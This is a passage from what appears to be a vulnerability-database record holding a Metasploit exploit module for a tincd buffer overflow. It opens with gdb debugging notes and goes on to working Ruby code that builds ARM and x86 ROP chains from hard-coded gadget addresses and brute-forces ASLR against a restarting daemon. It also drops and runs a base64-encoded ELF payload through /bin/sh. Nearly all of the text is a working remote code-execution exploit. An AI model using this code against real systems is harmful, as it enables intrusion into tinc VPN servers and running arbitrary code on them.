signal SIGSEGV, Segmentation fault. \n# 0x90909090 in ?? () \n# ok, finally a different offset to eip. Let's figure it out: \n# $ tools/pattern_create.rb 1676 \n# Ok, pretty close, it's 1668. If we randomly choose ret as 0x9000 we get: \n# (gdb) break *0x9000 \n# Breakpoint 1 at 0x9000 \n# See that our shellcode is *on* the stack: \n# (gdb) x/10x $sp \n# 0xbee14308: 0x00000698 0x00000000 0x00000000 0x00000698 \n# 0xbee14318: 0x31203731 0x0a323736 0xe3a00002 0xe3a01001 <-- 0xe3a00002 is the start of our shellcode \n# 0xbee14328: 0xe3a02006 0xe3a07001 \n# let's explore the code we can reuse: \n# (gdb) info functions \n# objdump -d /usr/local/sbin/tincd >assembly.txt \n# while simply searching for the bx instruction we were not very lucky, \n# but searching for some \"pop pc\" it's easy to find nice gadgets. \n# we can write arguments to the .data section again: \n# 0x2b3f0->0x2b4ac at 0x0001b3f0: .data ALLOC LOAD DATA HAS_CONTENTS \n# The problem is we can not reliably forecast the system function's address, but it's \n# only one byte random, therefore we have to brute force it and/or find a memory leak. \n# Let's assume it's a restarting daemon: \n# create /etc/systemd/system/tincd.service and fill in Restart=restart-always \n \n# ARM Debian Wheezy on qemu \n# root@debian:~# apt-cache showpkg tinc \n# Package: tinc \n# Versions: \n# 1.0.19-3 (/var/lib/apt/lists/ftp.halifax.rwth-aachen.de_debian_dists_wheezy_main_binary-armhf_Packages) \n# nice, that's vulnerable \n# apt-get install tinc \n# apt-get install elfutils && ln -s /usr/bin/eu-readelf /usr/bin/readelf \n# wget \"http://www.trapkit.de/tools/checksec.sh\" && chmod +x checksec.sh \n# # ./checksec.sh --file /usr/sbin/tincd \n# RELRO STACK CANARY NX PIE RPATH RUNPATH FILE \n# Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH /usr/sbin/tincd \n# Puh, doesn't look too good for us, NX enabled, Stack canary present and a partial RELRO, I'm not going to cover this one here \n \npacket_payload = payload.encoded \n# Pidora and Fedora/ROP specific things \nif target.name =~ /Pidora 18/ || target.name =~ /Fedora 19/ \nrop_generator = nil \nfilename = rand_text_alpha(1) \ncd = \"cd #{datastore['BINARY_DROP_LOCATION']};\" \ncd = '' if datastore['BINARY_DROP_LOCATION'] == '.' \n \nif target.name =~ /Pidora 18/ \nprint_status('Using ROP and brute force ASLR guesses to defeat NX/ASLR on ARMv6 based Pidora 18') \nprint_status('This requires a restarting tincd daemon!') \nprint_status('Warning: This is likely to get tincd into a state where it doesn\\'t accept connections anymore') \nrop_generator = method(:create_pidora_rop) \nelsif target.name =~ /Fedora 19/ \nprint_status('Using ROP to defeat NX on Fedora 19') \nrop_generator = method(:create_fedora_rop) \nend \n \nif target.arch.include? ARCH_CMD \n# The CMD payloads are a bit tricky on Fedora. As of december 2013 \n# some of the generic unix payloads (e.g. reverse shell with awk) don't work \n# (even when executed directly in a terminal on Fedora) \n# use generic/custom and specify PAYLOADSTR without single quotes \n# it's usually sh -c *bla* \npacket_payload = create_fedora_rop(payload.encoded.split(' ', 3)) \nelse \n# the binary drop payloads \npacket_payload = get_cmd_binary_drop_payload(filename, cd, rop_generator) \nif packet_payload.length > target['offset'] \nprint_status(\"Plain version too big (#{packet_payload.length}, max. #{target['offset']}), trying zipped version\") \npacket_payload = get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator) \nvprint_status(\"Achieved version with #{packet_payload.length} bytes\") \nend \nend \nend \n \nif packet_payload.length > target['offset'] \nfail_with(Exploit::Failure::BadConfig, \"The resulting payload has #{packet_payload.length} bytes, we only have #{target['offset']} space.\") \nend \ninjection = packet_payload + rand_text_alpha(target['offset'] - packet_payload.length) + [target.ret].pack('V') \n \nvprint_status(\"Injection starts with #{injection.unpack('H*')[0][0..30]}...\") \n \nif target.name =~ /Pidora 18/ \n# we have to brute force to defeat ASLR \ndatastore['BRUTEFORCE_TRIES'].times do \nprint_status(\"Try #{n}: Initializing tinc exploit client (setting up ciphers)\") \nsetup_ciphers \nprint_status('Telling tinc exploit client to connect, handshake and send the payload') \nbegin \nsend_recv(injection) \nrescue RuntimeError, Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, ::Timeout::Error, ::EOFError => runtime_error \nprint_error(runtime_error.message) \nprint_error(runtime_error.backtrace.join(\"\\n\\t\")) \nrescue Rex::ConnectionRefused \nprint_error('Server refused connection. Is this really a restarting daemon? Try higher WAIT option.') \nsleep(3) \nnext \nend \nsecs = datastore['WAIT'] \nprint_status(\"Waiting #{secs} seconds for server to restart daemon (which will change the ASLR byte)\") \nsleep(secs) \nend \nprint_status(\"Brute force with #{datastore['BRUTEFORCE_TRIES']} tries done. If not successful you could try again.\") \nelse \n# Setup local ciphers \nprint_status('Initializing tinc exploit client (setting up ciphers)') \nsetup_ciphers \n# The tincdExploitClient will do the crypto handshake with the server and \n# send the injection (a packet), where the actual buffer overflow is triggered \nprint_status('Telling tinc exploit client to connect, handshake and send the payload') \nsend_recv(injection) \nend \nprint_status('Exploit finished') \nend \n \ndef get_cmd_binary_drop_payload(filename, cd, rop_generator) \nelf_base64 = Rex::Text.encode_base64(generate_payload_exe) \ncmd = ['/bin/sh', '-c', \"#{cd}echo #{elf_base64}|base64 -d>#{filename};chmod +x #{filename};./#{filename}\"] \nvprint_status(\"You will try to execute #{cmd.join(' ')}\") \nrop_generator.call(cmd) \nend \n \ndef get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator) \nelf_zipped_base64 = Rex::Text.encode_base64(Rex::Text.gzip(generate_payload_exe)) \ncmd = ['/bin/sh', '-c', \"#{cd}echo #{elf_zipped_base64}|base64 -d|gunzip>#{filename};chmod +x #{filename};./#{filename}\"] \nvprint_status(\"You will try to execute #{cmd.join(' ')}\") \nrop_generator.call(cmd) \nend \n \ndef create_pidora_rop(sys_execv_args) \nsys_execv_args = sys_execv_args.join(' ') \nsys_execv_args += \"\\x00\" \n \naslr_byte_guess = SecureRandom.random_bytes(1).ord \nprint_status(\"Using 0x#{aslr_byte_guess.to_s(16)} as random byte for ASLR brute force (hope the server will use the same at one point)\") \n \n# Gadgets tincd \n# c714: e1a00004 mov r0, r4 \n# c718: e8bd8010 pop {r4, pc} \nmov_r0_r4_pop_r4_ret = [0x0000c714].pack('V') \npop_r4_ret = [0x0000c718].pack('V') \n# 1cef4: e580400c str r4, [r0, #12] \n# 1cef8: e8bd8010 pop {r4, pc} \n# mov_r0_plus_12_to_r4_pop_r4_ret = [0x0001cef4].pack('V') \n \n# bba0: e5843000 str r3, [r4] \n# bba4: e8bd8010 pop {r4, pc} \nmov_to_r4_addr_pop_r4_ret = [0x0000bba0].pack('V') \n \n# 13ccc: e1a00003 mov r0, r3 \n# 13cd0: e8bd8008 pop {r3, pc} \npop_r3_ret = [0x00013cd0].pack('V') \n \n# address to start rop (removing 6 addresses of garbage from stack) \n# 15cb4: e8bd85f0 pop {r4, r5, r6, r7, r8, sl, pc} \n# start_rop = [0x00015cb4].pack('V') \n# see target Ret \n \n# system function address base to brute force \n# roughly 500 tests showed addresses between \n# 0xb6c18848 and 0xb6d17848 (0xff distance) \nsystem_addr = [0xb6c18848 + (aslr_byte_guess * 0x1000)].pack('V') \n \n# pointer into .data section \nloc_dot_data = 0x0002b3f0 # a location inside .data \n \n# Rop into system(), prepare address of payload in r0 \nrop = '' \n \n# first, let's put the payload into the .data section \n \n# Put the first location to write to in r4 \nrop += pop_r4_ret \n \nsys_execv_args.scan(/.{1,4}/).each_with_index do |argument_part, i| \n# Give location inside .data via stack \nrop += [loc_dot_data + i * 4].pack('V') \n# Pop 4 bytes of the command into r3 \nrop += pop_r3_ret \n# Give 4 bytes of command on stack \nif argument_part.length == 4 \nrop += argument_part \nelse \nrop += argument_part + rand_text_alpha(4 - argument_part.length) \nend \n# Write the 4 bytes to the writable location \nrop += mov_to_r4_addr_pop_r4_ret \nend \n \n# put the address of the payload into r4 \nrop += [loc_dot_data].pack('V') \n \n# now move r4 to r0 \nrop += mov_r0_r4_pop_r4_ret \nrop += rand_text_alpha(4) \n# we don't care what ends up in r4 now \n \n# call system \nrop += system_addr \nend \n \ndef create_fedora_rop(sys_execv_args) \n# Gadgets tincd \nloc_dot_data = 0x80692e0 # a location inside .data \npop_eax = [0x8065969].pack('V') # pop eax; ret \npop_ebx = [0x8049d8d].pack('V') # pop ebx; ret \npop_ecx = [0x804e113].pack('V') # pop ecx; ret \nxor_eax_eax = [0x804cd60].pack('V') # xor eax eax; ret \n# <ATTENTION> This one destroys ebx: \nmov_to_eax_addr = [0x805f2c2].pack('V') + rand_text_alpha(4) # mov [eax] ecx ; pop ebx ; ret \n# </ATTENTION> \n \n# Gadgets libcrypto.so.10 libcrypto.so.1.0.1e \nxchg_ecx_eax = [0x4d170d1f].pack('V') # xchg ecx,eax; ret \n# xchg_edx_eax = [0x4d25afa3].pack('V') # xchg edx,eax ; ret \n# inc_eax = [0x4d119ebc].pack('V') # inc eax ; ret \n \n# Gadgets libc.so.6 libc-2.17.so \npop_edx = [0x4b5d7aaa].pack('V') # pop edx; ret \nint_80 = [0x4b6049c5].pack('V') # int 0x80 \n \n# Linux kernel system call 11: sys_execve \n# ROP \nrop = '' \n \nindex = 0 \nstored_argument_pointer_offsets = [] \n \nsys_execv_args.each_with_index do |argument, argument_no| \nstored_argument_pointer_offsets << index \nargument.scan(/.{1,4}/).each_with_index do |argument_part, i| \n# Put location to write to in eax \nrop += pop_eax \n# Give location inside .data via stack \nrop += [loc_dot_data + index + i * 4].pack('V') \n# Pop 4 bytes of the command into ecx \nrop += pop_ecx \n# Give 4 bytes of command on stack \nif argument_part.length == 4 \nrop += argument_part \nelse \nrop += argument_part + rand_text_alpha(4 - argument_part.length) \nend \n# Write the 4 bytes to the writable location \nrop += mov_to_eax_addr \nend \n# We have to end the argument with a zero byte \nindex += argument.length \n# We don't have \"xor ecx, ecx\", but we have it for eax... \nrop += xor_eax_eax \nrop += xchg_ecx_eax \n# Put location to write to in eax \nrop += pop_eax \n# Give location inside .data via stack \nrop += [loc_dot_data + index].pack('V') \n# Write the zeros \nrop += mov_to_eax_addr \nindex += 1 # where we can write the next argument \nend \n \n# Append address of the start of each argument \nstored_argument_pointer_offsets.each do |offset| \nrop += pop_eax \nrop += [loc_dot_data + index].pack('V') \nrop += pop_ecx \nrop += [loc_dot_data + offset].pack('V') \nrop += mov_to_eax_addr \nindex += 4 \nend \n# end with zero \nrop += xor_eax_eax \nrop += xchg_ecx_eax \n \nrop += pop_eax \nrop += [loc_dot_data + index].pack('V') \nrop += mov_to_eax_addr \n \nrop += pop_ebx \nrop += [loc_dot_data].pack('V') \n \nrop += pop_ecx \nrop += [loc_dot_data + sys_execv_args.join(' ').length + 1].pack('V') \n \nrop += pop_edx \nrop += [loc_dot_data + index].pack('V') \n \n# sys call 11 = sys_execve \nrop += pop_eax \nrop += [0x0000000b].pack('V') \n \nrop += int_80 \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/129343/tincd_bof.rb.txt", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
